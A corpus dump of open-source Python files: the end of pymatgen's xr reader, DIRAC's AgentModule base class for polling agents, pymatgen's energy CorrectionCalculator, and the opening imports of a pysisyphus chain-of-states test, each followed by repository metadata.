header information and cell vectors, respectively.
Returns:
xr (Xr): Xr object corresponding to the input
file.
"""
with zopen(filename, "rt") as f:
return Xr.from_string(
f.read(), use_cores=use_cores,
thresh=thresh)
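if __name__ == "__main__":
    # Hedged usage sketch (illustrative, not part of the original module):
    # round-trip a simple rock-salt structure through the xr format. The
    # file name "NaCl.xr" is an arbitrary choice; Lattice and Structure are
    # the module-level imports above.
    rock_salt = Structure(Lattice.cubic(5.69), ["Na", "Cl"],
                          [[0, 0, 0], [0.5, 0.5, 0.5]])
    Xr(rock_salt).write_file("NaCl.xr")
    # Reading the file back discards shell positions by default (use_cores=True).
    print(Xr.from_file("NaCl.xr").structure)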
|
aykol/pymatgen
|
pymatgen/io/xr.py
|
Python
|
mit
| 6,270
|
[
"GULP",
"pymatgen"
] |
ac0668f4564a53654f9002a2f126b92827d0a50031749a811eb271a6e85b05f1
|
########################################################################
# $HeadURL$
# File : AgentModule.py
# Author : Adria Casajus
########################################################################
"""
Base class for all agent modules
"""
__RCSID__ = "$Id$"
import os
import threading
import time
import DIRAC
from DIRAC import S_OK, S_ERROR, gConfig, gLogger, gMonitor, rootPath
from DIRAC.ConfigurationSystem.Client import PathFinder
from DIRAC.FrameworkSystem.Client.MonitoringClient import MonitoringClient
from DIRAC.Core.Utilities.Shifter import setupShifterProxyInEnv
from DIRAC.Core.Utilities.ReturnValues import isReturnStructure
from DIRAC.Core.Utilities import Time, MemStat
def _checkDir( path ):
try:
os.makedirs( path )
except Exception:
pass
if not os.path.isdir( path ):
raise Exception( 'Can not create %s' % path )
class AgentModule:
""" Base class for all agent modules
This class is used by the AgentReactor Class to steer the execution of
DIRAC Agents.
For this purpose the following methods are used:
- am_initialize() just after instantiated
- am_getPollingTime() to set the execution frequency
- am_getMaxCycles() to determine the number of cycles
- am_go() for the actual execution of one cycle
Before each iteration, the following methods are used to determine
if the new cycle is to be started.
- am_getModuleParam( 'alive' )
- am_checkStopAgentFile()
- am_removeStopAgentFile()
To start new execution cycle the following methods are used
- am_getCyclesDone()
- am_setOption( 'MaxCycles', maxCycles )
At the same time it provides all Agents with common interface.
All Agent class must inherit from this base class and must implement
at least the following method:
- execute() main method called in the agent cycle
Additionally they may provide:
- initialize() for initial settings
- finalize() the graceful exit
- beginExecution() before each execution cycle
- endExecution() at the end of each execution cycle
The agent can be stopped either by a signal or by creating a 'stop_agent' file
in the controlDirectory defined in the agent configuration
"""
def __init__( self, agentName, loadName, baseAgentName = False, properties = {} ):
"""
Common __init__ method for all Agents.
All Agent modules must define:
__doc__
__RCSID__
They are used to populate __codeProperties
The following Options are used from the Configuration:
- /LocalSite/InstancePath
- /DIRAC/Setup
- Status
- Enabled
- PollingTime default = 120
- MaxCycles default = 500
- ControlDirectory control/SystemName/AgentName
- WorkDirectory work/SystemName/AgentName
- shifterProxy ''
- shifterProxyLocation WorkDirectory/SystemName/AgentName/.shifterCred
It defines the following default Options that can be set via Configuration (above):
- MonitoringEnabled True
- Enabled True if Status == Active
- PollingTime 120
- MaxCycles 500
- ControlDirectory control/SystemName/AgentName
- WorkDirectory work/SystemName/AgentName
- shifterProxy False
- shifterProxyLocation work/SystemName/AgentName/.shifterCred
different defaults can be set in the initialize() method of the Agent using am_setOption()
In order to get a shifter proxy in the environment during the execute()
the configuration Option 'shifterProxy' must be set, a default may be given
in the initialize() method.
"""
if baseAgentName and agentName == baseAgentName:
self.log = gLogger
standaloneModule = True
else:
self.log = gLogger.getSubLogger( agentName, child = False )
standaloneModule = False
self.__basePath = gConfig.getValue( '/LocalSite/InstancePath', rootPath )
self.__agentModule = None
self.__codeProperties = {}
self.__getCodeInfo()
self.__moduleProperties = { 'fullName' : agentName,
'loadName' : loadName,
'section' : PathFinder.getAgentSection( agentName ),
'loadSection' : PathFinder.getAgentSection( loadName ),
'standalone' : standaloneModule,
'cyclesDone' : 0,
'totalElapsedTime' : 0,
'setup' : gConfig.getValue( "/DIRAC/Setup", "Unknown" ),
'alive' : True }
self.__moduleProperties[ 'system' ], self.__moduleProperties[ 'agentName' ] = agentName.split( "/" )
self.__configDefaults = {}
self.__configDefaults[ 'MonitoringEnabled'] = True
    self.__configDefaults[ 'Enabled'] = self.am_getOption( "Status", "Active" ).lower() in ( 'active', )
self.__configDefaults[ 'PollingTime'] = self.am_getOption( "PollingTime", 120 )
self.__configDefaults[ 'MaxCycles'] = self.am_getOption( "MaxCycles", 500 )
self.__configDefaults[ 'ControlDirectory' ] = os.path.join( self.__basePath,
'control',
*agentName.split( "/" ) )
self.__configDefaults[ 'WorkDirectory' ] = os.path.join( self.__basePath,
'work',
*agentName.split( "/" ) )
self.__configDefaults[ 'shifterProxy' ] = ''
self.__configDefaults[ 'shifterProxyLocation' ] = os.path.join( self.__configDefaults[ 'WorkDirectory' ],
'.shifterCred' )
    if isinstance( properties, dict ):
for key in properties:
self.__moduleProperties[ key ] = properties[ key ]
self.__moduleProperties[ 'executors' ] = [ ( self.execute, () ) ]
self.__moduleProperties[ 'shifterProxy' ] = False
self.__monitorLastStatsUpdate = -1
self.monitor = None
self.__initializeMonitor()
self.__initialized = False
def __getCodeInfo( self ):
versionVar = "__RCSID__"
docVar = "__doc__"
try:
self.__agentModule = __import__( self.__class__.__module__,
globals(),
locals(),
versionVar )
except Exception:
self.log.exception( "Cannot load agent module" )
for prop in ( ( versionVar, "version" ), ( docVar, "description" ) ):
try:
self.__codeProperties[ prop[1] ] = getattr( self.__agentModule, prop[0] )
except Exception:
self.log.error( "Missing %s" % prop[0] )
self.__codeProperties[ prop[1] ] = 'unset'
self.__codeProperties[ 'DIRACVersion' ] = DIRAC.version
self.__codeProperties[ 'platform' ] = DIRAC.platform
def am_initialize( self, *initArgs ):
agentName = self.am_getModuleParam( 'fullName' )
result = self.initialize( *initArgs )
if not isReturnStructure( result ):
return S_ERROR( "initialize must return S_OK/S_ERROR" )
if not result[ 'OK' ]:
return S_ERROR( "Error while initializing %s: %s" % ( agentName, result[ 'Message' ] ) )
_checkDir( self.am_getControlDirectory() )
workDirectory = self.am_getWorkDirectory()
_checkDir( workDirectory )
# Set the work directory in an environment variable available to subprocesses if needed
os.environ['AGENT_WORKDIRECTORY'] = workDirectory
self.__moduleProperties[ 'shifterProxy' ] = self.am_getOption( 'shifterProxy' )
if self.am_monitoringEnabled():
self.monitor.enable()
if len( self.__moduleProperties[ 'executors' ] ) < 1:
return S_ERROR( "At least one executor method has to be defined" )
if not self.am_Enabled():
return S_ERROR( "Agent is disabled via the configuration" )
self.log.notice( "="*40 )
self.log.notice( "Loaded agent module %s" % self.__moduleProperties[ 'fullName' ] )
self.log.notice( " Site: %s" % DIRAC.siteName() )
self.log.notice( " Setup: %s" % gConfig.getValue( "/DIRAC/Setup" ) )
self.log.notice( " Base Module version: %s " % __RCSID__ )
self.log.notice( " Agent version: %s" % self.__codeProperties[ 'version' ] )
self.log.notice( " DIRAC version: %s" % DIRAC.version )
self.log.notice( " DIRAC platform: %s" % DIRAC.platform )
pollingTime = int( self.am_getOption( 'PollingTime' ) )
if pollingTime > 3600:
self.log.notice( " Polling time: %s hours" % ( pollingTime / 3600. ) )
else:
self.log.notice( " Polling time: %s seconds" % self.am_getOption( 'PollingTime' ) )
self.log.notice( " Control dir: %s" % self.am_getControlDirectory() )
self.log.notice( " Work dir: %s" % self.am_getWorkDirectory() )
if self.am_getOption( 'MaxCycles' ) > 0:
self.log.notice( " Cycles: %s" % self.am_getMaxCycles() )
else:
self.log.notice( " Cycles: unlimited" )
self.log.notice( "="*40 )
self.__initialized = True
return S_OK()
def am_getControlDirectory( self ):
return os.path.join( self.__basePath, str( self.am_getOption( 'ControlDirectory' ) ) )
def am_getStopAgentFile( self ):
return os.path.join( self.am_getControlDirectory(), 'stop_agent' )
def am_checkStopAgentFile( self ):
return os.path.isfile( self.am_getStopAgentFile() )
def am_createStopAgentFile( self ):
try:
fd = open( self.am_getStopAgentFile(), 'w' )
fd.write( 'Dirac site agent Stopped at %s' % Time.toString() )
fd.close()
except Exception:
pass
def am_removeStopAgentFile( self ):
try:
os.unlink( self.am_getStopAgentFile() )
except Exception:
pass
def am_getBasePath( self ):
return self.__basePath
def am_getWorkDirectory( self ):
return os.path.join( self.__basePath, str( self.am_getOption( 'WorkDirectory' ) ) )
def am_getShifterProxyLocation( self ):
return os.path.join( self.__basePath, str( self.am_getOption( 'shifterProxyLocation' ) ) )
def am_getOption( self, optionName, defaultValue = None ):
    if defaultValue is None:
if optionName in self.__configDefaults:
defaultValue = self.__configDefaults[ optionName ]
if optionName and optionName[0] == "/":
return gConfig.getValue( optionName, defaultValue )
for section in ( self.__moduleProperties[ 'section' ], self.__moduleProperties[ 'loadSection' ] ):
result = gConfig.getOption( "%s/%s" % ( section, optionName ), defaultValue )
if result[ 'OK' ]:
return result[ 'Value' ]
return defaultValue
def am_setOption( self, optionName, value ):
self.__configDefaults[ optionName ] = value
def am_getModuleParam( self, optionName ):
return self.__moduleProperties[ optionName ]
def am_setModuleParam( self, optionName, value ):
self.__moduleProperties[ optionName ] = value
def am_getPollingTime( self ):
return self.am_getOption( "PollingTime" )
def am_getMaxCycles( self ):
return self.am_getOption( "MaxCycles" )
def am_getCyclesDone( self ):
return self.am_getModuleParam( 'cyclesDone' )
def am_Enabled( self ):
return self.am_getOption( "Enabled" )
def am_disableMonitoring( self ):
self.am_setOption( 'MonitoringEnabled' , False )
def am_monitoringEnabled( self ):
return self.am_getOption( "MonitoringEnabled" )
def am_stopExecution( self ):
self.am_setModuleParam( 'alive', False )
def __initializeMonitor( self ):
"""
Initialize the system monitor client
"""
if self.__moduleProperties[ 'standalone' ]:
self.monitor = gMonitor
else:
self.monitor = MonitoringClient()
self.monitor.setComponentType( self.monitor.COMPONENT_AGENT )
self.monitor.setComponentName( self.__moduleProperties[ 'fullName' ] )
self.monitor.initialize()
self.monitor.registerActivity( 'CPU', "CPU Usage", 'Framework', "CPU,%", self.monitor.OP_MEAN, 600 )
self.monitor.registerActivity( 'MEM', "Memory Usage", 'Framework', 'Memory,MB', self.monitor.OP_MEAN, 600 )
# Component monitor
for field in ( 'version', 'DIRACVersion', 'description', 'platform' ):
self.monitor.setComponentExtraParam( field, self.__codeProperties[ field ] )
self.monitor.setComponentExtraParam( 'startTime', Time.dateTime() )
self.monitor.setComponentExtraParam( 'cycles', 0 )
self.monitor.disable()
self.__monitorLastStatsUpdate = time.time()
def am_secureCall( self, functor, args = (), name = False ):
if not name:
name = str( functor )
try:
result = functor( *args )
if not isReturnStructure( result ):
raise Exception( "%s method for %s module has to return S_OK/S_ERROR" % ( name, self.__moduleProperties[ 'fullName' ] ) )
return result
    except Exception as e:
self.log.exception( "Exception while calling %s method" % name )
return S_ERROR( "Exception while calling %s method: %s" % ( name, str( e ) ) )
def _setShifterProxy( self ):
if self.__moduleProperties[ "shifterProxy" ]:
result = setupShifterProxyInEnv( self.__moduleProperties[ "shifterProxy" ],
self.am_getShifterProxyLocation() )
if not result[ 'OK' ]:
self.log.error( result['Message'] )
return result
return S_OK()
def am_go( self ):
# Set the shifter proxy if required
result = self._setShifterProxy()
if not result[ 'OK' ]:
return result
self.log.notice( "-"*40 )
self.log.notice( "Starting cycle for module %s" % self.__moduleProperties[ 'fullName' ] )
mD = self.am_getMaxCycles()
if mD > 0:
cD = self.__moduleProperties[ 'cyclesDone' ]
self.log.notice( "Remaining %s of %s cycles" % ( mD - cD, mD ) )
self.log.notice( "-"*40 )
elapsedTime = time.time()
cpuStats = self._startReportToMonitoring()
cycleResult = self.__executeModuleCycle()
if cpuStats:
self._endReportToMonitoring( *cpuStats )
# Increment counters
self.__moduleProperties[ 'cyclesDone' ] += 1
# Show status
elapsedTime = time.time() - elapsedTime
self.__moduleProperties[ 'totalElapsedTime' ] += elapsedTime
self.log.notice( "-"*40 )
self.log.notice( "Agent module %s run summary" % self.__moduleProperties[ 'fullName' ] )
self.log.notice( " Executed %s times previously" % self.__moduleProperties[ 'cyclesDone' ] )
self.log.notice( " Cycle took %.2f seconds" % elapsedTime )
averageElapsedTime = self.__moduleProperties[ 'totalElapsedTime' ] / self.__moduleProperties[ 'cyclesDone' ]
self.log.notice( " Average execution time: %.2f seconds" % ( averageElapsedTime ) )
elapsedPollingRate = averageElapsedTime * 100 / self.am_getOption( 'PollingTime' )
self.log.notice( " Polling time: %s seconds" % self.am_getOption( 'PollingTime' ) )
self.log.notice( " Average execution/polling time: %.2f%%" % elapsedPollingRate )
if cycleResult[ 'OK' ]:
self.log.notice( " Cycle was successful" )
else:
self.log.warn( " Cycle had an error:", cycleResult[ 'Message' ] )
self.log.notice( "-"*40 )
# Update number of cycles
self.monitor.setComponentExtraParam( 'cycles', self.__moduleProperties[ 'cyclesDone' ] )
return cycleResult
def _startReportToMonitoring( self ):
try:
now = time.time()
stats = os.times()
cpuTime = stats[0] + stats[2]
if now - self.__monitorLastStatsUpdate < 10:
return ( now, cpuTime )
      # Remember when the stats were last sent
      self.__monitorLastStatsUpdate = now
# Send Memory consumption mark
membytes = MemStat.VmB( 'VmRSS:' )
if membytes:
mem = membytes / ( 1024. * 1024. )
gMonitor.addMark( 'MEM', mem )
return( now, cpuTime )
except Exception:
return False
def _endReportToMonitoring( self, initialWallTime, initialCPUTime ):
wallTime = time.time() - initialWallTime
stats = os.times()
cpuTime = stats[0] + stats[2] - initialCPUTime
percentage = cpuTime / wallTime * 100.
if percentage > 0:
gMonitor.addMark( 'CPU', percentage )
def __executeModuleCycle( self ):
# Execute the beginExecution function
result = self.am_secureCall( self.beginExecution, name = "beginExecution" )
if not result[ 'OK' ]:
return result
# Launch executor functions
executors = self.__moduleProperties[ 'executors' ]
if len( executors ) == 1:
result = self.am_secureCall( executors[0][0], executors[0][1] )
if not result[ 'OK' ]:
return result
else:
exeThreads = [ threading.Thread( target = executor[0], args = executor[1] ) for executor in executors ]
for thread in exeThreads:
thread.setDaemon( 1 )
thread.start()
for thread in exeThreads:
thread.join()
# Execute the endExecution function
return self.am_secureCall( self.endExecution, name = "endExecution" )
def initialize( self, *args, **kwargs ):
return S_OK()
def beginExecution( self ):
return S_OK()
def endExecution( self ):
return S_OK()
def finalize( self ):
return S_OK()
def execute( self ):
return S_ERROR( "Execute method has to be overwritten by agent module" )
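if __name__ == "__main__":
  # Hedged sketch (illustrative only, not part of the original module): the
  # minimal shape of a concrete agent module. A real agent lives inside a
  # DIRAC system package and is driven by the AgentReactor; the class name
  # and option value below are hypothetical.
  class PingAgent( AgentModule ):
    def initialize( self ):
      # Defaults can be changed here before the first cycle
      self.am_setOption( 'PollingTime', 60 )
      return S_OK()
    def execute( self ):
      self.log.info( "Completed %s cycles so far" % self.am_getCyclesDone() )
      return S_OK()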
|
sposs/DIRAC
|
Core/Base/AgentModule.py
|
Python
|
gpl-3.0
| 17,556
|
[
"DIRAC"
] |
94c9eb5dab19a1644234154c4bc4e800cb9ff21620b3fd32cda234bb7dd9d82d
|
"""
This module calculates corrections for the species listed below, fitted to the experimental and computed
entries given to the CorrectionCalculator constructor.
"""
import os
import warnings
from collections import OrderedDict
from typing import Dict, List, Tuple, Union, Optional
import numpy as np
import plotly.graph_objects as go
from monty.serialization import loadfn
from scipy.optimize import curve_fit
from pymatgen.core import yaml
from pymatgen.core.composition import Composition
from pymatgen.core.periodic_table import Element
from pymatgen.analysis.reaction_calculator import ComputedReaction
from pymatgen.analysis.structure_analyzer import sulfide_type
def _func(x, *m):
"""
Helper function for curve_fit.
"""
return np.dot(x, m)
class CorrectionCalculator:
"""
A CorrectionCalculator contains experimental and computed entries which it uses to compute corrections.
It graphs residual errors after applying the computed corrections and creates the MPCompatibility.yaml
file the Correction classes use.
Attributes:
species: list of species that corrections are being calculated for
exp_compounds: list of dictionaries which each contain a compound's formula and experimental data
calc_compounds: dictionary of ComputedEntry objects
corrections: list of corrections in same order as species list
corrections_std_error: list of the variances of the corrections in same order as species list
corrections_dict: dictionary of format {'species': (value, uncertainty)} for easier correction lookup
"""
def __init__(
self,
species: List[str] = [
"oxide",
"peroxide",
"superoxide",
"S",
"F",
"Cl",
"Br",
"I",
"N",
"Se",
"Si",
"Sb",
"Te",
"V",
"Cr",
"Mn",
"Fe",
"Co",
"Ni",
"W",
"Mo",
"H",
],
max_error: float = 0.1,
allow_unstable: Union[float, bool] = 0.1,
exclude_polyanions: List[str] = [
"SO4",
"SO3",
"CO3",
"NO3",
"NO2",
"OCl3",
"ClO3",
"ClO4",
"HO",
"ClO",
"SeO3",
"TiO3",
"TiO4",
"WO4",
"SiO3",
"SiO4",
"Si2O5",
"PO3",
"PO4",
"P2O7",
],
) -> None:
"""
Initializes a CorrectionCalculator.
Args:
species: list of species to calculate corrections for
max_error: maximum tolerable relative uncertainty in experimental energy.
Compounds with relative uncertainty greater than this value will be excluded from the fit
allow_unstable: whether unstable entries are to be included in the fit. If True, all compounds will
be included regardless of their energy above hull. If False or a float, compounds with
energy above hull greater than the given value (defaults to 0.1 eV/atom) will be
excluded
exclude_polyanions: a list of polyanions that contain additional sources of error that may negatively
influence the quality of the fitted corrections. Compounds with these polyanions
will be excluded from the fit
"""
self.species = species
self.max_error = max_error
if not allow_unstable:
self.allow_unstable = 0.1
else:
self.allow_unstable = allow_unstable
self.exclude_polyanions = exclude_polyanions
self.corrections: List[float] = []
self.corrections_std_error: List[float] = []
self.corrections_dict: Dict[str, Tuple[float, float]] = {} # {'species': (value, uncertainty)}
# to help the graph_residual_error_per_species() method differentiate between oxygen containing compounds
if "oxide" in self.species:
self.oxides: List[str] = []
if "peroxide" in self.species:
self.peroxides: List[str] = []
if "superoxide" in self.species:
self.superoxides: List[str] = []
if "S" in self.species:
self.sulfides: List[str] = []
def compute_from_files(self, exp_gz: str, comp_gz: str):
"""
Args:
exp_gz: name of .json.gz file that contains experimental data
data in .json.gz file should be a list of dictionary objects with the following keys/values:
{"formula": chemical formula, "exp energy": formation energy in eV/formula unit,
"uncertainty": uncertainty in formation energy}
comp_gz: name of .json.gz file that contains computed entries
data in .json.gz file should be a dictionary of {chemical formula: ComputedEntry}
"""
exp_entries = loadfn(exp_gz)
calc_entries = loadfn(comp_gz)
return self.compute_corrections(exp_entries, calc_entries)
def compute_corrections(self, exp_entries: list, calc_entries: dict) -> dict:
"""
Computes the corrections and fills in correction, corrections_std_error, and corrections_dict.
Args:
exp_entries: list of dictionary objects with the following keys/values:
{"formula": chemical formula, "exp energy": formation energy in eV/formula unit,
"uncertainty": uncertainty in formation energy}
calc_entries: dictionary of computed entries, of the form {chemical formula: ComputedEntry}
Raises:
ValueError: calc_compounds is missing an entry
"""
self.exp_compounds = exp_entries
self.calc_compounds = calc_entries
self.names: List[str] = []
self.diffs: List[float] = []
self.coeff_mat: List[List[float]] = []
self.exp_uncer: List[float] = []
# remove any corrections in calc_compounds
for entry in self.calc_compounds.values():
entry.correction = 0
for cmpd_info in self.exp_compounds:
# to get consistent element ordering in formula
name = Composition(cmpd_info["formula"]).reduced_formula
allow = True
compound = self.calc_compounds.get(name, None)
if not compound:
warnings.warn(
"Compound {} is not found in provided computed entries and is excluded from the fit".format(name)
)
continue
# filter out compounds with large uncertainties
relative_uncertainty = abs(cmpd_info["uncertainty"] / cmpd_info["exp energy"])
if relative_uncertainty > self.max_error:
allow = False
                warnings.warn(
                    "Compound {} is excluded from the fit due to high experimental uncertainty ({:.1%})".format(
                        name, relative_uncertainty
                    )
                )
# filter out compounds containing certain polyanions
for anion in self.exclude_polyanions:
if anion in name or anion in cmpd_info["formula"]:
allow = False
warnings.warn(
"Compound {} contains the polyanion {} and is excluded from the fit".format(name, anion)
)
break
# filter out compounds that are unstable
if isinstance(self.allow_unstable, float):
try:
eah = compound.data["e_above_hull"]
except KeyError:
raise ValueError("Missing e above hull data")
if eah > self.allow_unstable:
allow = False
warnings.warn(
"Compound {} is unstable and excluded from the fit (e_above_hull = {})".format(name, eah)
)
if allow:
comp = Composition(name)
elems = list(comp.as_dict())
reactants = []
for elem in elems:
try:
elem_name = Composition(elem).reduced_formula
reactants.append(self.calc_compounds[elem_name])
except KeyError:
raise ValueError("Computed entries missing " + elem)
rxn = ComputedReaction(reactants, [compound])
rxn.normalize_to(comp)
energy = rxn.calculated_reaction_energy
coeff = []
for specie in self.species:
if specie == "oxide":
if compound.data["oxide_type"] == "oxide":
coeff.append(comp["O"])
self.oxides.append(name)
else:
coeff.append(0)
elif specie == "peroxide":
if compound.data["oxide_type"] == "peroxide":
coeff.append(comp["O"])
self.peroxides.append(name)
else:
coeff.append(0)
elif specie == "superoxide":
if compound.data["oxide_type"] == "superoxide":
coeff.append(comp["O"])
self.superoxides.append(name)
else:
coeff.append(0)
elif specie == "S":
if Element("S") in comp:
sf_type = "sulfide"
if compound.data.get("sulfide_type"):
sf_type = compound.data["sulfide_type"]
elif hasattr(compound, "structure"):
sf_type = sulfide_type(compound.structure)
if sf_type == "sulfide":
coeff.append(comp["S"])
self.sulfides.append(name)
else:
coeff.append(0)
else:
coeff.append(0)
else:
try:
coeff.append(comp[specie])
except ValueError:
raise ValueError("We can't detect this specie: {}".format(specie))
self.names.append(name)
self.diffs.append((cmpd_info["exp energy"] - energy) / comp.num_atoms)
self.coeff_mat.append([i / comp.num_atoms for i in coeff])
self.exp_uncer.append((cmpd_info["uncertainty"]) / comp.num_atoms)
# for any exp entries with no uncertainty value, assign average uncertainty value
sigma = np.array(self.exp_uncer)
sigma[sigma == 0] = np.nan
with warnings.catch_warnings():
warnings.simplefilter(
"ignore", category=RuntimeWarning
) # numpy raises warning if the entire array is nan values
mean_uncer = np.nanmean(sigma)
sigma = np.where(np.isnan(sigma), mean_uncer, sigma)
if np.isnan(mean_uncer):
# no uncertainty values for any compounds, don't try to weight
popt, self.pcov = curve_fit(_func, self.coeff_mat, self.diffs, p0=np.ones(len(self.species)))
else:
popt, self.pcov = curve_fit(
_func,
self.coeff_mat,
self.diffs,
p0=np.ones(len(self.species)),
sigma=sigma,
absolute_sigma=True,
)
self.corrections = popt.tolist()
self.corrections_std_error = np.sqrt(np.diag(self.pcov)).tolist()
for i, v in enumerate(self.species):
self.corrections_dict[v] = (
round(self.corrections[i], 3),
round(self.corrections_std_error[i], 4),
)
        # set ozonide correction to 0 so that this species does not receive a correction
# while other oxide types do
self.corrections_dict["ozonide"] = (0, 0)
return self.corrections_dict
def graph_residual_error(self) -> go.Figure:
"""
Graphs the residual errors for all compounds after applying computed corrections.
"""
if len(self.corrections) == 0:
raise RuntimeError("Please call compute_corrections or compute_from_files to calculate corrections first")
abs_errors = [abs(i) for i in self.diffs - np.dot(self.coeff_mat, self.corrections)]
labels_graph = self.names.copy()
abs_errors, labels_graph = (list(t) for t in zip(*sorted(zip(abs_errors, labels_graph)))) # sort by error
num = len(abs_errors)
fig = go.Figure(
data=go.Scatter(
x=np.linspace(1, num, num),
y=abs_errors,
mode="markers",
text=labels_graph,
),
layout=go.Layout(
title=go.layout.Title(text="Residual Errors"),
yaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text="Residual Error (eV/atom)")),
),
)
print("Residual Error:")
print("Median = " + str(np.median(np.array(abs_errors))))
print("Mean = " + str(np.mean(np.array(abs_errors))))
print("Std Dev = " + str(np.std(np.array(abs_errors))))
print("Original Error:")
print("Median = " + str(abs(np.median(np.array(self.diffs)))))
print("Mean = " + str(abs(np.mean(np.array(self.diffs)))))
print("Std Dev = " + str(np.std(np.array(self.diffs))))
return fig
def graph_residual_error_per_species(self, specie: str) -> go.Figure:
"""
Graphs the residual errors for each compound that contains specie after applying computed corrections.
Args:
specie: the specie/group that residual errors are being plotted for
Raises:
ValueError: the specie is not a valid specie that this class fits corrections for
"""
if specie not in self.species:
raise ValueError("not a valid specie")
if len(self.corrections) == 0:
raise RuntimeError("Please call compute_corrections or compute_from_files to calculate corrections first")
abs_errors = [abs(i) for i in self.diffs - np.dot(self.coeff_mat, self.corrections)]
labels_species = self.names.copy()
diffs_cpy = self.diffs.copy()
num = len(labels_species)
if specie in ("oxide", "peroxide", "superoxide", "S"):
if specie == "oxide":
compounds = self.oxides
elif specie == "peroxide":
compounds = self.peroxides
            elif specie == "superoxide":
compounds = self.superoxides
else:
compounds = self.sulfides
for i in range(num):
if labels_species[num - i - 1] not in compounds:
del labels_species[num - i - 1]
del abs_errors[num - i - 1]
del diffs_cpy[num - i - 1]
else:
for i in range(num):
if not Composition(labels_species[num - i - 1])[specie]:
del labels_species[num - i - 1]
del abs_errors[num - i - 1]
del diffs_cpy[num - i - 1]
abs_errors, labels_species = (list(t) for t in zip(*sorted(zip(abs_errors, labels_species)))) # sort by error
num = len(abs_errors)
fig = go.Figure(
data=go.Scatter(
x=np.linspace(1, num, num),
y=abs_errors,
mode="markers",
text=labels_species,
),
layout=go.Layout(
title=go.layout.Title(text="Residual Errors for " + specie),
yaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text="Residual Error (eV/atom)")),
),
)
print("Residual Error:")
print("Median = " + str(np.median(np.array(abs_errors))))
print("Mean = " + str(np.mean(np.array(abs_errors))))
print("Std Dev = " + str(np.std(np.array(abs_errors))))
print("Original Error:")
print("Median = " + str(abs(np.median(np.array(diffs_cpy)))))
print("Mean = " + str(abs(np.mean(np.array(diffs_cpy)))))
print("Std Dev = " + str(np.std(np.array(diffs_cpy))))
return fig
def make_yaml(self, name: str = "MP2020", dir: Optional[str] = None) -> None:
"""
Creates the _name_Compatibility.yaml that stores corrections as well as _name_CompatibilityUncertainties.yaml
for correction uncertainties.
Args:
name: str, alternate name for the created .yaml file.
Default: "MP2020"
dir: str, directory in which to save the file. Pass None (default) to
save the file in the current working directory.
"""
if len(self.corrections) == 0:
raise RuntimeError("Please call compute_corrections or compute_from_files to calculate corrections first")
# elements with U values
ggaucorrection_species = ["V", "Cr", "Mn", "Fe", "Co", "Ni", "W", "Mo"]
comp_corr: "OrderedDict[str, float]" = OrderedDict()
o: "OrderedDict[str, float]" = OrderedDict()
f: "OrderedDict[str, float]" = OrderedDict()
comp_corr_error: "OrderedDict[str, float]" = OrderedDict()
o_error: "OrderedDict[str, float]" = OrderedDict()
f_error: "OrderedDict[str, float]" = OrderedDict()
for specie in list(self.species) + ["ozonide"]:
if specie in ggaucorrection_species:
o[specie] = self.corrections_dict[specie][0]
f[specie] = self.corrections_dict[specie][0]
o_error[specie] = self.corrections_dict[specie][1]
f_error[specie] = self.corrections_dict[specie][1]
else:
comp_corr[specie] = self.corrections_dict[specie][0]
comp_corr_error[specie] = self.corrections_dict[specie][1]
outline = """\
Name:
Corrections:
GGAUMixingCorrections:
O:
F:
CompositionCorrections:
Uncertainties:
GGAUMixingCorrections:
O:
F:
CompositionCorrections:
"""
fn = name + "Compatibility.yaml"
if dir:
path = os.path.join(dir, fn)
else:
path = fn
yml = yaml.YAML()
yml.Representer.add_representer(OrderedDict, yml.Representer.represent_dict)
yml.default_flow_style = False
contents = yml.load(outline)
contents["Name"] = name
# make CommentedMap so comments can be added
contents["Corrections"]["GGAUMixingCorrections"]["O"] = yaml.comments.CommentedMap(o)
contents["Corrections"]["GGAUMixingCorrections"]["F"] = yaml.comments.CommentedMap(f)
contents["Corrections"]["CompositionCorrections"] = yaml.comments.CommentedMap(comp_corr)
contents["Uncertainties"]["GGAUMixingCorrections"]["O"] = yaml.comments.CommentedMap(o_error)
contents["Uncertainties"]["GGAUMixingCorrections"]["F"] = yaml.comments.CommentedMap(f_error)
contents["Uncertainties"]["CompositionCorrections"] = yaml.comments.CommentedMap(comp_corr_error)
contents["Corrections"].yaml_set_start_comment("Energy corrections in eV/atom", indent=2)
contents["Corrections"]["GGAUMixingCorrections"].yaml_set_start_comment(
"Composition-based corrections applied to transition metal oxides\nand fluorides to "
+ 'make GGA and GGA+U energies compatible\nwhen compat_type = "Advanced" (default)',
indent=4,
)
contents["Corrections"]["CompositionCorrections"].yaml_set_start_comment(
"Composition-based corrections applied to any compound containing\nthese species as anions",
indent=4,
)
contents["Uncertainties"].yaml_set_start_comment(
"Uncertainties corresponding to each energy correction (eV/atom)", indent=2
)
with open(path, "w") as file:
yml.dump(contents, file)
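if __name__ == "__main__":
    # Hedged usage sketch (illustrative only, not part of the original
    # module): fit corrections from a pair of .json.gz files and write the
    # compatibility YAML. The file names are hypothetical placeholders.
    calculator = CorrectionCalculator()
    corrections = calculator.compute_from_files(
        "exp_compounds.json.gz", "calc_compounds.json.gz"
    )
    print(corrections)
    calculator.graph_residual_error().show()
    calculator.make_yaml(name="MP2020")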
|
gmatteo/pymatgen
|
pymatgen/entries/correction_calculator.py
|
Python
|
mit
| 20,772
|
[
"pymatgen"
] |
7afbfb7b4107558f50ac2635ad7d9177904f13b20c15c0d454271e135abd7797
|
from Inference import Inference
from Gaussian import Gaussian
|
aerialhedgehog/VyPy
|
trunk/VyPy/regression/gpr/inference/__init__.py
|
Python
|
bsd-3-clause
| 63
|
[
"Gaussian"
] |
cd7906a55cde184987b45bf9dd38fd0045c880deb16439ba44b312f703b7c95e
|
import matplotlib.pyplot as plt
import numpy as np
import pytest
from pysisyphus.calculators.AnaPot import AnaPot
from pysisyphus.calculators.MullerBrownSympyPot import MullerBrownPot
from pysisyphus.cos.NEB import NEB
from pysisyphus.cos.SimpleZTS import SimpleZTS
from pysisyphus.Geometry import Geometry
from pysisyphus.interpolate.Interpolator import Interpolator
from pysisyphus.optimizers.LBFGS import LBFGS
from pysisyphus.optimizers.ConjugateGradient import ConjugateGradient
from pysisyphus.optimizers.QuickMin import QuickMin
from pysisyphus.optimizers.FIRE import FIRE
from pysisyphus.optimizers.SteepestDescent import SteepestDescent
from pysisyphus.optimizers.RFOptimizer import RFOptimizer
from pysisyphus.plotters.AnimPlot import AnimPlot
from pysisyphus.run import run_from_dict
from pysisyphus.testing import using
def get_geoms():
initial = AnaPot.get_geom((-1.05274, 1.02776, 0))
